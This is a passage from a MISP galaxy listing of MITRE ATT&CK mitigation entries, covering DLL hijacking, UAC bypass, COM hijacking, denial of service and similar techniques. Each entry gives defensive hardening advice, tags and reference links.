https://attack.mitre.org/mitigations/T1083

https://technet.microsoft.com/en-us/library/ee791851.aspx

DLL Search Order Hijacking Mitigation - T1038

Disallow loading of remote DLLs. (Citation: Microsoft DLL Preloading) This is included by default in Windows Server 2012+ and is available by patch for XP+ and Server 2003+. (Citation: Microsoft DLL Search) Path Algorithm

Enable Safe DLL Search Mode to force search for system DLLs in directories with greater restrictions (e.g. <code>%SYSTEMROOT%</code>)to be used before local directory DLLs (e.g. a user’s home directory). The Safe DLL Search Mode can be enabled via Group Policy at Computer Configuration > [Policies] > Administrative Templates > MSS (Legacy): MSS: (SafeDllSearchMode) Enable Safe DLL search mode. The associated Windows Registry key for this is located at <code>HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDLLSearchMode</code> (Citation: Microsoft DLL Search)

Use auditing tools capable of detecting DLL search order hijacking opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for DLL hijacking weaknesses. (Citation: Powersploit)

Identify and block potentially malicious software that may be executed through search order hijacking by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: misp-galaxy:mitre-course-of-action="DLL Search Order Hijacking Mitigation - T1038"

DLL Search Order Hijacking Mitigation - T1038 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038" with estimative-language:likelihood-probability="almost-certain"

Table 6471. Table References

Links

http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx

http://msdn.microsoft.com/en-US/library/ms682586

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1038

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://github.com/mattifestation/PowerSploit

File System Permissions Weakness Mitigation - T1044

Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses. (Citation: Powersploit)

Identify and block potentially malicious software that may be executed through abuse of file, directory, and service permissions by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs. Deny execution from user directories such as file download directories and temp directories where able. (Citation: Seclists Kanthak 7zip Installer)

Turn off UAC’s privilege elevation for standard users <code>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]</code>to automatically deny elevation requests, add: <code>"ConsentPromptBehaviorUser"=dword:00000000</code> (Citation: Seclists Kanthak 7zip Installer). Consider enabling installer detection for all users by adding: <code>"EnableInstallerDetection"=dword:00000001</code>. This will prompt for a password for installation and also log the attempt. To disable installer detection, instead add: <code>"EnableInstallerDetection"=dword:00000000</code>. This may prevent potential elevation of privileges through exploitation during the process of UAC detecting the installer, but will allow the installation process to continue without being logged.

The tag is: misp-galaxy:mitre-course-of-action="File System Permissions Weakness Mitigation - T1044"

File System Permissions Weakness Mitigation - T1044 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="File System Permissions Weakness - T1044" with estimative-language:likelihood-probability="almost-certain"

Table 6472. Table References

Links

http://seclists.org/fulldisclosure/2015/Dec/34

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1044

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://github.com/mattifestation/PowerSploit

System Network Connections Discovery Mitigation - T1049

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about network connections, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Network Connections Discovery Mitigation - T1049"

System Network Connections Discovery Mitigation - T1049 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 6473. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1049

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Service Registry Permissions Weakness Mitigation - T1058

Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.

Identify and block potentially malicious software that may be executed through service abuse by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.

The tag is: misp-galaxy:mitre-course-of-action="Service Registry Permissions Weakness Mitigation - T1058"

Service Registry Permissions Weakness Mitigation - T1058 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Service Registry Permissions Weakness - T1058" with estimative-language:likelihood-probability="almost-certain"

Table 6474. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1058

Indicator Removal from Tools Mitigation - T1066

Mitigation is difficult in instances like this because the adversary may have access to the system through another channel and can learn what techniques or tools are blocked by resident defenses. Exercising best practices with configuration and security as well as ensuring that proper process is followed during investigation of potential compromise is essential to detecting a larger intrusion through discrete alerts.

Identify and block potentially malicious software that may be used by an adversary by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Indicator Removal from Tools Mitigation - T1066"

Indicator Removal from Tools Mitigation - T1066 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1066" with estimative-language:likelihood-probability="almost-certain"

Table 6475. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://attack.mitre.org/mitigations/T1066

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

Exploitation for Privilege Escalation Mitigation - T1068

Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software components targeted for privilege escalation.

The tag is: misp-galaxy:mitre-course-of-action="Exploitation for Privilege Escalation Mitigation - T1068"

Exploitation for Privilege Escalation Mitigation - T1068 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 6476. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

https://attack.mitre.org/mitigations/T1068

https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/

https://en.wikipedia.org/wiki/Control-flow_integrity

Bypass User Account Control Mitigation - T1088

Remove users from the local administrator group on systems. Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).

Check for common UAC bypass weaknesses on Windows systems to be aware of the risk posture and address issues where appropriate. (Citation: Github UACMe)

The tag is: misp-galaxy:mitre-course-of-action="Bypass User Account Control Mitigation - T1088"

Bypass User Account Control Mitigation - T1088 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088" with estimative-language:likelihood-probability="almost-certain"

Table 6477. Table References

Links

https://attack.mitre.org/mitigations/T1088

https://github.com/hfiref0x/UACME

Exploitation for Defense Evasion Mitigation - T1211

Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.

The tag is: misp-galaxy:mitre-course-of-action="Exploitation for Defense Evasion Mitigation - T1211"

Exploitation for Defense Evasion Mitigation - T1211 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"

Table 6478. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

https://attack.mitre.org/mitigations/T1211

https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/

https://en.wikipedia.org/wiki/Control-flow_integrity

Extra Window Memory Injection Mitigation - T1181

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Although EWM injection may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Extra Window Memory Injection Mitigation - T1181"

Extra Window Memory Injection Mitigation - T1181 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1181" with estimative-language:likelihood-probability="almost-certain"

Table 6479. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1181

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Exploitation for Credential Access Mitigation - T1212

Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.

The tag is: misp-galaxy:mitre-course-of-action="Exploitation for Credential Access Mitigation - T1212"

Exploitation for Credential Access Mitigation - T1212 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"

Table 6480. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

https://attack.mitre.org/mitigations/T1212

https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/

https://en.wikipedia.org/wiki/Control-flow_integrity

Component Object Model Hijacking Mitigation - T1122

Direct mitigation of this technique may not be recommended for a particular environment since COM objects are a legitimate part of the operating system and installed software. Blocking COM object changes may have unforeseen side effects to legitimate functionality.

Instead, identify and block potentially malicious software that may execute, or be executed by, this technique using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Component Object Model Hijacking Mitigation - T1122"

Component Object Model Hijacking Mitigation - T1122 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1122" with estimative-language:likelihood-probability="almost-certain"

Table 6481. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1122

https://technet.microsoft.com/en-us/library/ee791851.aspx

Data from Information Repositories Mitigation - T1213

To mitigate adversary access to information repositories for collection:

  • Develop and publish policies that define acceptable information to be stored

  • Appropriate implementation of access control mechanisms that include both authentication and appropriate authorization

  • Enforce the principle of least-privilege

  • Periodic privilege review of accounts

  • Mitigate access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) that may be used to access repositories

The tag is: misp-galaxy:mitre-course-of-action="Data from Information Repositories Mitigation - T1213"

Data from Information Repositories Mitigation - T1213 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"

Table 6482. Table References

Links

https://attack.mitre.org/mitigations/T1213

Kernel Modules and Extensions Mitigation - T1215

Common tools for detecting Linux rootkits include: rkhunter (Citation: SourceForge rkhunter), chrootkit (Citation: Chkrootkit Main), although rootkits may be designed to evade certain detection tools.

LKMs and Kernel extensions require root level permissions to be installed. Limit access to the root account and prevent users from loading kernel modules and extensions through proper privilege separation and limiting Privilege Escalation opportunities.

Application whitelisting and software restriction tools, such as SELinux, can also aide in restricting kernel module loading. (Citation: Kernel.org Restrict Kernel Module)

The tag is: misp-galaxy:mitre-course-of-action="Kernel Modules and Extensions Mitigation - T1215"

Kernel Modules and Extensions Mitigation - T1215 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1215" with estimative-language:likelihood-probability="almost-certain"

Table 6483. Table References

Links

http://rkhunter.sourceforge.net

http://www.chkrootkit.org/

https://attack.mitre.org/mitigations/T1215

https://patchwork.kernel.org/patch/8754821/

Network Share Connection Removal Mitigation - T1126

Follow best practices for mitigation of activity related to establishing [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).

Identify unnecessary system utilities or potentially malicious software that may be used to leverage network shares, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Network Share Connection Removal Mitigation - T1126"

Network Share Connection Removal Mitigation - T1126 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1126" with estimative-language:likelihood-probability="almost-certain"

Table 6484. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1126

https://technet.microsoft.com/en-us/library/ee791851.aspx

Signed Script Proxy Execution Mitigation - T1216

Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Signed Script Proxy Execution Mitigation - T1216"

Signed Script Proxy Execution Mitigation - T1216 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 6485. Table References

Links

https://attack.mitre.org/mitigations/T1216

Execution through Module Load Mitigation - T1129

Directly mitigating module loads and API calls related to module loads will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying and correlated subsequent behavior to determine if it is the result of malicious activity.

The tag is: misp-galaxy:mitre-course-of-action="Execution through Module Load Mitigation - T1129"

Execution through Module Load Mitigation - T1129 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"

Table 6486. Table References

Links

https://attack.mitre.org/mitigations/T1129

Distributed Component Object Model Mitigation - T1175

Modify Registry settings (directly or using Dcomcnfg.exe) in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID{AppID_GUID}</code> associated with the process-wide security of individual COM applications. (Citation: Microsoft Process Wide Com Keys)

Modify Registry settings (directly or using Dcomcnfg.exe) in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole</code> associated with system-wide security defaults for all COM applications that do no set their own process-wide security. (Citation: Microsoft System Wide Com Keys) (Citation: Microsoft COM ACL)

Consider disabling DCOM through Dcomcnfg.exe. (Citation: Microsoft Disable DCOM)

Enable Windows firewall, which prevents DCOM instantiation by default.

Ensure all COM alerts and Protected View are enabled. (Citation: Microsoft Protected View)

The tag is: misp-galaxy:mitre-course-of-action="Distributed Component Object Model Mitigation - T1175"

Distributed Component Object Model Mitigation - T1175 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Component Object Model and Distributed COM - T1175" with estimative-language:likelihood-probability="almost-certain"

Table 6487. Table References

Links

https://attack.mitre.org/mitigations/T1175

https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1

https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx

https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653

https://technet.microsoft.com/library/cc771387.aspx

Man in the Browser Mitigation - T1185

Since browser pivoting requires a high integrity process to launch from, restricting user permissions and addressing Privilege Escalation and [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) opportunities can limit the exposure to this technique.

Close all browser sessions regularly and when they are no longer needed.

The tag is: misp-galaxy:mitre-course-of-action="Man in the Browser Mitigation - T1185"

Man in the Browser Mitigation - T1185 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"

Table 6488. Table References

Links

https://attack.mitre.org/mitigations/T1185

Hidden Files and Directories Mitigation - T1158

Mitigation of this technique may be difficult and unadvised due to the the legitimate use of hidden files and directories.

The tag is: misp-galaxy:mitre-course-of-action="Hidden Files and Directories Mitigation - T1158"

Hidden Files and Directories Mitigation - T1158 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1158" with estimative-language:likelihood-probability="almost-certain"

Table 6489. Table References

Links

https://attack.mitre.org/mitigations/T1158

Data Encrypted for Impact Mitigation - T1486

Consider implementing IT disaster recovery plans that contain procedures for regularly taking and testing data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP)

In some cases, the means to decrypt files affected by a ransomware campaign is released to the public. Research trusted sources for public releases of decryptor tools/keys to reverse the effects of ransomware.

Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data Encrypted for Impact Mitigation - T1486"

Table 6490. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1486

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.ready.gov/business/implementation/IT

Network Denial of Service Mitigation - T1498

When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)

Depending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)

As immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)

The tag is: misp-galaxy:mitre-course-of-action="Network Denial of Service Mitigation - T1498"

Table 6491. Table References

Links

http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf

https://attack.mitre.org/mitigations/T1498

Endpoint Denial of Service Mitigation - T1499

Leverage services provided by Content Delivery Networks (CDN) or providers specializing in DoS mitigations to filter traffic upstream from services.(Citation: CERT-EU DDoS March 2017) Filter boundary traffic by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport. To defend against SYN floods, enable SYN Cookies.

The tag is: misp-galaxy:mitre-course-of-action="Endpoint Denial of Service Mitigation - T1499"

Table 6492. Table References

Links

http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf

https://attack.mitre.org/mitigations/T1499

Exploit Public-Facing Application Mitigation - T1190

Application isolation and least privilege help lesson the impact of an exploit. Application isolation will limit what other processes and system features the exploited target can access, and least privilege for service accounts will limit what permissions the exploited process gets on the rest of the system. Web Application Firewalls may be used to limit exposure of applications.

Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.

Use secure coding best practices when designing custom software that is meant for deployment to externally facing systems. Avoid issues documented by OWASP, CWE, and other software weakness identification efforts.

Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.

The tag is: misp-galaxy:mitre-course-of-action="Exploit Public-Facing Application Mitigation - T1190"

Exploit Public-Facing Application Mitigation - T1190 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 6493. Table References

Links

https://attack.mitre.org/mitigations/T1190

Two-Factor Authentication Interception Mitigation - T1111

Remove smart cards when not in use. Protect devices and services used to transmit and receive out-of-band codes.

Identify and block potentially malicious software that may be used to intercept 2FA credentials on a system by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Two-Factor Authentication Interception Mitigation - T1111"

Two-Factor Authentication Interception Mitigation - T1111 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication Interception - T1111" with estimative-language:likelihood-probability="almost-certain"

Table 6494. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1111

https://technet.microsoft.com/en-us/library/ee791851.aspx

.bash_profile and .bashrc Mitigation - T1156

Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.

The tag is: misp-galaxy:mitre-course-of-action=".bash_profile and .bashrc Mitigation - T1156"

bash_profile and .bashrc Mitigation - T1156 has relationships with:
  • mitigates: misp-galaxy:mitre-attack-pattern="Malicious Shell Modification - T1156" with estimative-language:likelihood-probability="almost-certain"

Table 6495. Table References

Links

https://attack.mitre.org/mitigations/T1156

System Owner/User Discovery Mitigation - T1033

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system users, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Owner/User Discovery Mitigation - T1033"

System Owner/User Discovery Mitigation - T1033 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

Table 6496. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1033

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Application Window Discovery Mitigation - T1010

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Application Window Discovery Mitigation - T1010"

Application Window Discovery Mitigation - T1010 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

Table 6497. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1010

https://technet.microsoft.com/en-us/library/ee791851.aspx

Behavior Prevention on Endpoint - M1040

Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.

The tag is: misp-galaxy:mitre-course-of-action="Behavior Prevention on Endpoint - M1040"

Table 6498. Table References

Links

https://attack.mitre.org/mitigations/M1040

Winlogon Helper DLL Mitigation - T1004

Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.

Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: misp-galaxy:mitre-course-of-action="Winlogon Helper DLL Mitigation - T1004"

Winlogon Helper DLL Mitigation - T1004 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1004" with estimative-language:likelihood-probability="almost-certain"

Table 6499. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

